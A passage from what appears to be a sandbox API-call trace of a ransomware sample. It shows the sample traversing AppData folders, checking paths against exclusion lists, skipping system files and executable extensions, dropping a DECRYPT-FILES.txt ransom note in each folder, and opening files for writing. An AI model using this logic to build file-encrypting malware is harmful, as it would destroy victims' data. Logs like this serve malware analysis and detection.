nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="XLSTART\\", cAlternateFileName="")) returned 0 [0077.796] FindClose (in: hFindFile=0x5f8cd8 | out: hFindFile=0x5f8cd8) returned 1 [0077.796] CloseHandle (hObject=0x448) returned 1 [0077.797] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IME12", cAlternateFileName="")) returned 1 [0077.797] lstrcmpW (lpString1="IME12", lpString2=".") returned 1 [0077.797] lstrcmpW (lpString1="IME12", lpString2="..") returned 1 [0077.797] lstrcatW (in: lpString1="IME12", lpString2="\\" | out: lpString1="IME12\\") returned="IME12\\" [0077.797] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpString2="IME12\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\" [0077.797] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\", lpSrch="\\Program Files") returned 0x0 [0077.797] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\", lpSrch=":\\Windows") returned 0x0 [0077.797] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\", lpSrch="\\Games\\") returned 0x0 [0077.797] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\", lpSrch="\\Tor Browser\\") returned 0x0 [0077.797] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\", lpSrch="\\ProgramData\\") returned 0x0 [0077.797] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0077.797] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0077.797] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0077.797] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\", lpSrch="\\All Users") returned 0x0 [0077.797] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\", lpSrch="\\IETldCache\\") returned 0x0 [0077.797] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\", lpSrch="\\Local Settings\\") returned 0x0 [0077.797] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\", lpSrch="\\AppData\\Local") returned 0x0 [0077.797] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\", lpSrch="AhnLab") returned 0x0 [0077.797] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0077.797] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\") returned 62 [0077.797] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.797] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\\\jkbimi8.tmp") returned 74 [0077.797] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ime12\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x448 [0077.798] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\") returned 62 [0077.798] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0077.798] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\\\DECRYPT-FILES.txt") returned 80 [0077.799] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ime12\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0077.799] WriteFile (in: hFile=0x44c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e1b8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e1b8*=0x23fc, lpOverlapped=0x0) returned 1 [0077.800] CloseHandle (hObject=0x44c) returned 1 [0077.800] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\") returned 62 [0077.800] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\*" [0077.800] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\*", lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xaa91b380, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa91b380, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8cd8 [0077.801] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.801] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xaa91b380, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa91b380, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0077.801] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0077.801] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.801] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa91b380, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa91b380, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa91b380, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0077.801] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0077.801] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa91b380, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa91b380, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa91b380, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0077.801] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0077.801] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0077.801] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0077.801] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0077.801] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0077.801] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0077.801] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0077.801] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0077.801] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0077.801] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0077.801] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.801] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0077.801] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0077.801] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0077.801] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0077.801] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\") returned 62 [0077.801] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.801] lstrcpyW (in: lpString1=0x3f2e1ac, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\" [0077.801] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\jkbimi8.tmp" [0077.801] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0077.802] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IME12\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ime12\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0077.802] CloseHandle (hObject=0x0) returned 0 [0077.802] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.802] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa91b380, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa91b380, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa91b380, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0077.802] FindClose (in: hFindFile=0x5f8cd8 | out: hFindFile=0x5f8cd8) returned 1 [0077.802] CloseHandle (hObject=0x448) returned 1 [0077.802] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IMJP12", cAlternateFileName="")) returned 1 [0077.802] lstrcmpW (lpString1="IMJP12", lpString2=".") returned 1 [0077.802] lstrcmpW (lpString1="IMJP12", lpString2="..") returned 1 [0077.802] lstrcatW (in: lpString1="IMJP12", lpString2="\\" | out: lpString1="IMJP12\\") returned="IMJP12\\" [0077.802] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpString2="IMJP12\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\" [0077.802] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\", lpSrch="\\Program Files") returned 0x0 [0077.802] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\", lpSrch=":\\Windows") returned 0x0 [0077.802] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\", lpSrch="\\Games\\") returned 0x0 [0077.802] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\", lpSrch="\\Tor Browser\\") returned 0x0 [0077.802] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\", lpSrch="\\ProgramData\\") returned 0x0 [0077.802] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0077.802] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0077.803] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0077.803] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\", lpSrch="\\All Users") returned 0x0 [0077.803] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\", lpSrch="\\IETldCache\\") returned 0x0 [0077.803] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\", lpSrch="\\Local Settings\\") returned 0x0 [0077.803] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\", lpSrch="\\AppData\\Local") returned 0x0 [0077.803] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\", lpSrch="AhnLab") returned 0x0 [0077.803] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0077.803] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\") returned 63 [0077.803] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.803] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\\\jkbimi8.tmp") returned 75 [0077.803] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\imjp12\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x448 [0077.803] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\") returned 63 [0077.803] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0077.803] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\\\DECRYPT-FILES.txt") returned 81 [0077.803] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\imjp12\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0077.804] WriteFile (in: hFile=0x44c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e1b8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e1b8*=0x23fc, lpOverlapped=0x0) returned 1 [0077.805] CloseHandle (hObject=0x44c) returned 1 [0077.805] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\") returned 63 [0077.805] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\*" [0077.805] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\*", lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xaa91b380, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa91b380, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8cd8 [0077.805] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.805] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xaa91b380, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa91b380, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0077.805] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0077.805] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.805] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa91b380, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa91b380, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa91b380, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0077.805] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0077.805] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa91b380, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa91b380, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa91b380, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0077.806] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0077.806] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0077.806] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0077.806] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0077.806] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0077.806] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0077.806] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0077.806] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0077.806] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0077.806] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0077.806] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.806] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0077.806] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0077.806] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0077.806] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0077.806] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\") returned 63 [0077.806] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.806] lstrcpyW (in: lpString1=0x3f2e1ac, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\" [0077.806] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\jkbimi8.tmp" [0077.806] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0077.806] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP12\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\imjp12\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0077.806] CloseHandle (hObject=0x0) returned 0 [0077.806] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.807] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa91b380, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa91b380, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa91b380, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0077.807] FindClose (in: hFindFile=0x5f8cd8 | out: hFindFile=0x5f8cd8) returned 1 [0077.807] CloseHandle (hObject=0x448) returned 1 [0077.807] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="IMJP8_1", cAlternateFileName="")) returned 1 [0077.807] lstrcmpW (lpString1="IMJP8_1", lpString2=".") returned 1 [0077.807] lstrcmpW (lpString1="IMJP8_1", lpString2="..") returned 1 [0077.807] lstrcatW (in: lpString1="IMJP8_1", lpString2="\\" | out: lpString1="IMJP8_1\\") returned="IMJP8_1\\" [0077.807] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpString2="IMJP8_1\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\" [0077.807] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\", lpSrch="\\Program Files") returned 0x0 [0077.807] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\", lpSrch=":\\Windows") returned 0x0 [0077.807] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\", lpSrch="\\Games\\") returned 0x0 [0077.807] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\IMJP8_1\\", lpSrch="\\Tor Browser\\") returned 0x0 [0077.807] StrStrW 